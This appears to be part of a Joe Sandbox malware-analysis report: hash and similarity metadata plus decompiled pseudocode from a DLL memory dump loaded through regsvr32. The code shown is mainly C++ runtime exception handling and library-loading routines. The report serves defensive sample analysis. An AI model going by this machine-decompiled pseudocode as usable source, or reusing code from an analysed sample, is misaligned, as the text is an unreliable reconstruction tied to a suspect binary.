                                                                                                                                                                                                                    • API ID: GestureInfo$CloseHandle
                                                                                                                                                                                                                    • String ID: 8
                                                                                                                                                                                                                    • API String ID: 372500805-4194326291
                                                                                                                                                                                                                    • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                                    • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                                                                                                                    • String ID: i
                                                                                                                                                                                                                    • API String ID: 3181456275-3865851505
                                                                                                                                                                                                                    • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                                                                                                                                    • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1917832262-0
                                                                                                                                                                                                                    • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                                                                                                                                    • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                    			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                                                                                                                                                                    				void* __rbx;
                                                                                                                                                                                                                    				void* __rdi;
                                                                                                                                                                                                                    				void* __rsi;
                                                                                                                                                                                                                    				void* __rbp;
                                                                                                                                                                                                                    				signed int* _t128;
                                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                                    				intOrPtr _t146;
                                                                                                                                                                                                                    				intOrPtr _t154;
                                                                                                                                                                                                                    				void* _t173;
                                                                                                                                                                                                                    				intOrPtr _t176;
                                                                                                                                                                                                                    				signed int _t177;
                                                                                                                                                                                                                    				signed int _t178;
                                                                                                                                                                                                                    				void* _t209;
                                                                                                                                                                                                                    				signed long long _t219;
                                                                                                                                                                                                                    				signed long long _t220;
                                                                                                                                                                                                                    				signed long long _t226;
                                                                                                                                                                                                                    				long long _t228;
                                                                                                                                                                                                                    				signed int _t235;
                                                                                                                                                                                                                    				intOrPtr* _t236;
                                                                                                                                                                                                                    				intOrPtr* _t237;
                                                                                                                                                                                                                    				signed long long _t246;
                                                                                                                                                                                                                    				long long _t267;
                                                                                                                                                                                                                    				signed int* _t280;
                                                                                                                                                                                                                    				long long _t281;
                                                                                                                                                                                                                    				void* _t282;
                                                                                                                                                                                                                    				void* _t283;
                                                                                                                                                                                                                    				signed long long _t284;
                                                                                                                                                                                                                    				long long _t296;
                                                                                                                                                                                                                    				signed int _t307;
                                                                                                                                                                                                                    				unsigned long long _t313;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t180 = __esi;
                                                                                                                                                                                                                    				_t282 = _t283 - 0x28;
                                                                                                                                                                                                                    				_t284 = _t283 - 0x128;
                                                                                                                                                                                                                    				_t219 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				_t220 = _t219 ^ _t284;
                                                                                                                                                                                                                    				 *(_t282 + 0x10) = _t220;
                                                                                                                                                                                                                    				_t280 =  *((intOrPtr*)(_t282 + 0x90));
                                                                                                                                                                                                                    				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
                                                                                                                                                                                                                    				 *((long long*)(_t284 + 0x68)) = __r8;
                                                                                                                                                                                                                    				_t236 = __rcx;
                                                                                                                                                                                                                    				 *((long long*)(_t284 + 0x78)) = __rdx;
                                                                                                                                                                                                                    				 *(_t282 - 0x68) = _t307;
                                                                                                                                                                                                                    				 *((char*)(_t284 + 0x60)) = 0;
                                                                                                                                                                                                                    				_t281 = __r9;
                                                                                                                                                                                                                    				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
                                                                                                                                                                                                                    				r14d = _t128;
                                                                                                                                                                                                                    				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
                                                                                                                                                                                                                    				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
                                                                                                                                                                                                                    				if ( *_t236 != 0xe06d7363) goto 0x80003474;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
                                                                                                                                                                                                                    				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
                                                                                                                                                                                                                    				E00000001180002D40(_t220);
                                                                                                                                                                                                                    				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
                                                                                                                                                                                                                    				E00000001180002D40(_t220);
                                                                                                                                                                                                                    				_t237 =  *((intOrPtr*)(_t220 + 0x20));
                                                                                                                                                                                                                    				E00000001180002D40(_t220);
                                                                                                                                                                                                                    				 *((char*)(_t284 + 0x60)) = 1;
                                                                                                                                                                                                                    				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
                                                                                                                                                                                                                    				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
                                                                                                                                                                                                                    				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
                                                                                                                                                                                                                    				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
                                                                                                                                                                                                                    				E00000001180002D40(_t220);
                                                                                                                                                                                                                    				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
                                                                                                                                                                                                                    				E00000001180002D40(_t220);
                                                                                                                                                                                                                    				E00000001180002D40(_t220);
                                                                                                                                                                                                                    				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
                                                                                                                                                                                                                    				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
                                                                                                                                                                                                                    				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
                                                                                                                                                                                                                    				goto 0x800037b0;
                                                                                                                                                                                                                    				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                                    				 *(_t282 - 0x48) = _t280;
                                                                                                                                                                                                                    				if ( *_t237 != 0xe06d7363) goto 0x80003747;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
                                                                                                                                                                                                                    				r15d = 0;
                                                                                                                                                                                                                    				if (_t280[3] - r15d <= 0) goto 0x80003678;
                                                                                                                                                                                                                    				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
                                                                                                                                                                                                                    				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                                    				r8d = r14d;
                                                                                                                                                                                                                    				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
                                                                                                                                                                                                                    				asm("movups xmm0, [ebp-0x28]");
                                                                                                                                                                                                                    				asm("movdqu [ebp-0x38], xmm0");
                                                                                                                                                                                                                    				asm("psrldq xmm0, 0x8");
                                                                                                                                                                                                                    				asm("movd eax, xmm0");
                                                                                                                                                                                                                    				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
                                                                                                                                                                                                                    				_t296 =  *((intOrPtr*)(_t282 - 0x28));
                                                                                                                                                                                                                    				r13d =  *((intOrPtr*)(_t282 - 0x30));
                                                                                                                                                                                                                    				 *((long long*)(_t282 - 0x80)) = _t296;
                                                                                                                                                                                                                    				_t146 = r13d;
                                                                                                                                                                                                                    				asm("inc ecx");
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
                                                                                                                                                                                                                    				asm("movd eax, xmm0");
                                                                                                                                                                                                                    				asm("movups [ebp-0x60], xmm0");
                                                                                                                                                                                                                    				if (_t146 - r14d > 0) goto 0x8000366b;
                                                                                                                                                                                                                    				_t226 =  *(_t282 - 0x60) >> 0x20;
                                                                                                                                                                                                                    				if (r14d - _t146 > 0) goto 0x8000366b;
                                                                                                                                                                                                                    				r12d = r15d;
                                                                                                                                                                                                                    				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                                    				_t313 =  *(_t282 - 0x58) >> 0x20;
                                                                                                                                                                                                                    				 *((long long*)(_t282 - 0x70)) = _t267;
                                                                                                                                                                                                                    				if (r15d == 0) goto 0x80003658;
                                                                                                                                                                                                                    				_t246 = _t226 + _t226 * 4;
                                                                                                                                                                                                                    				asm("movups xmm0, [edx+ecx*4]");
                                                                                                                                                                                                                    				asm("movups [ebp-0x8], xmm0");
                                                                                                                                                                                                                    				_t59 = _t246 * 4; // 0x48ccccc35f40c483
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
                                                                                                                                                                                                                    				E0000000118000241C(_t226);
                                                                                                                                                                                                                    				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
                                                                                                                                                                                                                    				 *((long long*)(_t284 + 0x70)) = _t228;
                                                                                                                                                                                                                    				E0000000118000241C(_t228);
                                                                                                                                                                                                                    				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
                                                                                                                                                                                                                    				if (_t176 <= 0) goto 0x800035e8;
                                                                                                                                                                                                                    				E0000000118000241C(_t228);
                                                                                                                                                                                                                    				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
                                                                                                                                                                                                                    				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
                                                                                                                                                                                                                    				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
                                                                                                                                                                                                                    				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
                                                                                                                                                                                                                    				if (_t154 > 0) goto 0x800035ac;
                                                                                                                                                                                                                    				r12d = r12d + 1;
                                                                                                                                                                                                                    				if (r12d == r15d) goto 0x8000365f;
                                                                                                                                                                                                                    				goto 0x80003565;
                                                                                                                                                                                                                    				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                                                                                                                                    				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
                                                                                                                                                                                                                    				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
                                                                                                                                                                                                                    				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
                                                                                                                                                                                                                    				 *(_t284 + 0x38) = _t282 - 0x60;
                                                                                                                                                                                                                    				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
                                                                                                                                                                                                                    				 *(_t284 + 0x28) = _t282 - 8;
                                                                                                                                                                                                                    				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                                    				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
                                                                                                                                                                                                                    				goto 0x80003664;
                                                                                                                                                                                                                    				goto 0x80003668;
                                                                                                                                                                                                                    				r15d = 0;
                                                                                                                                                                                                                    				r13d = r13d + 1;
                                                                                                                                                                                                                    				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
                                                                                                                                                                                                                    				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
                                                                                                                                                                                                                    				_t209 = _t280[8] - r15d;
                                                                                                                                                                                                                    				if (_t209 == 0) goto 0x8000369e;
                                                                                                                                                                                                                    				E00000001180002408(_t282 - 8);
                                                                                                                                                                                                                    				if (_t209 != 0) goto 0x800036bf;
                                                                                                                                                                                                                    				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
                                                                                                                                                                                                                    				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
                                                                                                                                                                                                                    				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
                                                                                                                                                                                                                    				if (_t280[8] == r15d) goto 0x800036e4;
                                                                                                                                                                                                                    				E00000001180002408(_t282 - 8 + _t280[8]);
                                                                                                                                                                                                                    				_t235 = _t280[8];
                                                                                                                                                                                                                    				goto 0x800036e7;
                                                                                                                                                                                                                    				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
                                                                                                                                                                                                                    				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
                                                                                                                                                                                                                    				_t177 =  *((intOrPtr*)(_t282 + 0x98));
                                                                                                                                                                                                                    				 *(_t284 + 0x50) = _t177;
                                                                                                                                                                                                                    				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                                                                    				 *((long long*)(_t284 + 0x48)) = _t281;
                                                                                                                                                                                                                    				 *(_t284 + 0x40) = _t313;
                                                                                                                                                                                                                    				 *(_t284 + 0x38) = _t178;
                                                                                                                                                                                                                    				 *(_t284 + 0x30) = _t178;
                                                                                                                                                                                                                    				 *(_t284 + 0x28) = _t280;
                                                                                                                                                                                                                    				 *(_t284 + 0x20) = _t313;
                                                                                                                                                                                                                    				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
                                                                                                                                                                                                                    				goto 0x80003784;
                                                                                                                                                                                                                    				if (_t280[3] <= 0) goto 0x80003784;
                                                                                                                                                                                                                    				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
                                                                                                                                                                                                                    				 *(_t284 + 0x38) = _t307;
                                                                                                                                                                                                                    				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
                                                                                                                                                                                                                    				 *(_t284 + 0x28) = r14d;
                                                                                                                                                                                                                    				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                                    				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
                                                                                                                                                                                                                    				_t173 = E00000001180002D40(_t235);
                                                                                                                                                                                                                    				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
                                                                                                                                                                                                                    				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
                                                                                                                                                                                                                    			}

































                                                                                                                                                                                                                    0x180003328
                                                                                                                                                                                                                    0x180003335
                                                                                                                                                                                                                    0x18000333a
                                                                                                                                                                                                                    0x180003341
                                                                                                                                                                                                                    0x180003348
                                                                                                                                                                                                                    0x18000334b
                                                                                                                                                                                                                    0x18000334f
                                                                                                                                                                                                                    0x180003359
                                                                                                                                                                                                                    0x180003363
                                                                                                                                                                                                                    0x180003368
                                                                                                                                                                                                                    0x18000336b
                                                                                                                                                                                                                    0x180003376
                                                                                                                                                                                                                    0x18000337d
                                                                                                                                                                                                                    0x180003382
                                                                                                                                                                                                                    0x180003385
                                                                                                                                                                                                                    0x18000338a
                                                                                                                                                                                                                    0x180003390
                                                                                                                                                                                                                    0x180003399
                                                                                                                                                                                                                    0x1800033a5
                                                                                                                                                                                                                    0x1800033af
                                                                                                                                                                                                                    0x1800033c0
                                                                                                                                                                                                                    0x1800033cb
                                                                                                                                                                                                                    0x1800033d1
                                                                                                                                                                                                                    0x1800033db
                                                                                                                                                                                                                    0x1800033e1
                                                                                                                                                                                                                    0x1800033e6
                                                                                                                                                                                                                    0x1800033ea
                                                                                                                                                                                                                    0x1800033f3
                                                                                                                                                                                                                    0x1800033fc
                                                                                                                                                                                                                    0x180003401
                                                                                                                                                                                                                    0x18000340c
                                                                                                                                                                                                                    0x180003412
                                                                                                                                                                                                                    0x18000341f
                                                                                                                                                                                                                    0x180003426
                                                                                                                                                                                                                    0x18000342c
                                                                                                                                                                                                                    0x180003436
                                                                                                                                                                                                                    0x180003438
                                                                                                                                                                                                                    0x180003441
                                                                                                                                                                                                                    0x18000344c
                                                                                                                                                                                                                    0x180003458
                                                                                                                                                                                                                    0x180003464
                                                                                                                                                                                                                    0x18000346a
                                                                                                                                                                                                                    0x180003478
                                                                                                                                                                                                                    0x18000347c
                                                                                                                                                                                                                    0x180003486
                                                                                                                                                                                                                    0x180003490
                                                                                                                                                                                                                    0x1800034a1
                                                                                                                                                                                                                    0x1800034a7
                                                                                                                                                                                                                    0x1800034ae
                                                                                                                                                                                                                    0x1800034be
                                                                                                                                                                                                                    0x1800034c9
                                                                                                                                                                                                                    0x1800034ce
                                                                                                                                                                                                                    0x1800034d1
                                                                                                                                                                                                                    0x1800034d6
                                                                                                                                                                                                                    0x1800034da
                                                                                                                                                                                                                    0x1800034df
                                                                                                                                                                                                                    0x1800034e4
                                                                                                                                                                                                                    0x1800034eb
                                                                                                                                                                                                                    0x1800034f1
                                                                                                                                                                                                                    0x1800034f5
                                                                                                                                                                                                                    0x1800034f9
                                                                                                                                                                                                                    0x180003508
                                                                                                                                                                                                                    0x180003517
                                                                                                                                                                                                                    0x180003521
                                                                                                                                                                                                                    0x180003524
                                                                                                                                                                                                                    0x180003528
                                                                                                                                                                                                                    0x18000352f
                                                                                                                                                                                                                    0x180003539
                                                                                                                                                                                                                    0x180003540
                                                                                                                                                                                                                    0x180003546
                                                                                                                                                                                                                    0x18000354c
                                                                                                                                                                                                                    0x180003554
                                                                                                                                                                                                                    0x180003558
                                                                                                                                                                                                                    0x18000355f
                                                                                                                                                                                                                    0x180003568
                                                                                                                                                                                                                    0x18000356c
                                                                                                                                                                                                                    0x180003570
                                                                                                                                                                                                                    0x180003574
                                                                                                                                                                                                                    0x180003578
                                                                                                                                                                                                                    0x18000357b
                                                                                                                                                                                                                    0x18000358c
                                                                                                                                                                                                                    0x18000358f
                                                                                                                                                                                                                    0x180003594
                                                                                                                                                                                                                    0x1800035a1
                                                                                                                                                                                                                    0x1800035a4
                                                                                                                                                                                                                    0x1800035aa
                                                                                                                                                                                                                    0x1800035ac
                                                                                                                                                                                                                    0x1800035c7
                                                                                                                                                                                                                    0x1800035d2
                                                                                                                                                                                                                    0x1800035d8
                                                                                                                                                                                                                    0x1800035de
                                                                                                                                                                                                                    0x1800035e0
                                                                                                                                                                                                                    0x1800035e6
                                                                                                                                                                                                                    0x1800035e8
                                                                                                                                                                                                                    0x1800035ee
                                                                                                                                                                                                                    0x1800035f4
                                                                                                                                                                                                                    0x180003612
                                                                                                                                                                                                                    0x18000361a
                                                                                                                                                                                                                    0x180003622
                                                                                                                                                                                                                    0x18000362d
                                                                                                                                                                                                                    0x180003635
                                                                                                                                                                                                                    0x18000363e
                                                                                                                                                                                                                    0x180003647
                                                                                                                                                                                                                    0x18000364c
                                                                                                                                                                                                                    0x180003651
                                                                                                                                                                                                                    0x180003656
                                                                                                                                                                                                                    0x18000365d
                                                                                                                                                                                                                    0x180003668
                                                                                                                                                                                                                    0x18000366b
                                                                                                                                                                                                                    0x180003672
                                                                                                                                                                                                                    0x180003684
                                                                                                                                                                                                                    0x18000368a
                                                                                                                                                                                                                    0x18000368e
                                                                                                                                                                                                                    0x180003690
                                                                                                                                                                                                                    0x18000369c
                                                                                                                                                                                                                    0x1800036a6
                                                                                                                                                                                                                    0x1800036b9
                                                                                                                                                                                                                    0x1800036c7
                                                                                                                                                                                                                    0x1800036d1
                                                                                                                                                                                                                    0x1800036d3
                                                                                                                                                                                                                    0x1800036db
                                                                                                                                                                                                                    0x1800036e2
                                                                                                                                                                                                                    0x1800036f1
                                                                                                                                                                                                                    0x180003704
                                                                                                                                                                                                                    0x180003709
                                                                                                                                                                                                                    0x18000371a
                                                                                                                                                                                                                    0x18000371e
                                                                                                                                                                                                                    0x180003721
                                                                                                                                                                                                                    0x180003726
                                                                                                                                                                                                                    0x18000372b
                                                                                                                                                                                                                    0x18000372f
                                                                                                                                                                                                                    0x180003736
                                                                                                                                                                                                                    0x18000373b
                                                                                                                                                                                                                    0x180003740
                                                                                                                                                                                                                    0x180003745
                                                                                                                                                                                                                    0x18000374b
                                                                                                                                                                                                                    0x180003754
                                                                                                                                                                                                                    0x180003763
                                                                                                                                                                                                                    0x18000376b
                                                                                                                                                                                                                    0x180003772
                                                                                                                                                                                                                    0x18000377a
                                                                                                                                                                                                                    0x18000377f
                                                                                                                                                                                                                    0x180003784
                                                                                                                                                                                                                    0x18000378e
                                                                                                                                                                                                                    0x1800037af

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                    • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                                                                                                                                    • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                    			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                    				signed long long _t56;
                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                    				signed long long _t72;
                                                                                                                                                                                                                    				long long _t78;
                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                    				signed long long _t88;
                                                                                                                                                                                                                    				signed long long _t89;
                                                                                                                                                                                                                    				signed long long _t90;
                                                                                                                                                                                                                    				WCHAR* _t91;
                                                                                                                                                                                                                    				long _t94;
                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                    				WCHAR* _t102;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				 *((long long*)(_t82 + 8)) = __rbx;
                                                                                                                                                                                                                    				 *((long long*)(_t82 + 0x10)) = _t78;
                                                                                                                                                                                                                    				 *((long long*)(_t82 + 0x18)) = __rsi;
                                                                                                                                                                                                                    				r15d = __ecx;
                                                                                                                                                                                                                    				_t72 = _t71 | 0xffffffff;
                                                                                                                                                                                                                    				_t89 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
                                                                                                                                                                                                                    				asm("dec ecx");
                                                                                                                                                                                                                    				if (_t88 == _t72) goto 0x8000a51f;
                                                                                                                                                                                                                    				if (_t88 == 0) goto 0x8000a441;
                                                                                                                                                                                                                    				_t56 = _t88;
                                                                                                                                                                                                                    				goto 0x8000a521;
                                                                                                                                                                                                                    				if (__r8 == __r9) goto 0x8000a504;
                                                                                                                                                                                                                    				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
                                                                                                                                                                                                                    				if (_t60 == 0) goto 0x8000a469;
                                                                                                                                                                                                                    				if (_t60 != _t72) goto 0x8000a55e;
                                                                                                                                                                                                                    				goto 0x8000a4f0;
                                                                                                                                                                                                                    				r8d = 0x800;
                                                                                                                                                                                                                    				LoadLibraryExW(_t102, _t97, _t94);
                                                                                                                                                                                                                    				if (_t56 != 0) goto 0x8000a53e;
                                                                                                                                                                                                                    				if (GetLastError() != 0x57) goto 0x8000a4de;
                                                                                                                                                                                                                    				_t14 = _t56 - 0x50; // -80
                                                                                                                                                                                                                    				_t35 = _t14;
                                                                                                                                                                                                                    				r8d = _t35;
                                                                                                                                                                                                                    				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                                                                                                                                    				r8d = _t35;
                                                                                                                                                                                                                    				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
                                                                                                                                                                                                                    				r8d = 0;
                                                                                                                                                                                                                    				LoadLibraryExW(_t91, _t71);
                                                                                                                                                                                                                    				if (_t56 != 0) goto 0x8000a53e;
                                                                                                                                                                                                                    				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
                                                                                                                                                                                                                    				if (__r8 + 4 != __r9) goto 0x8000a44a;
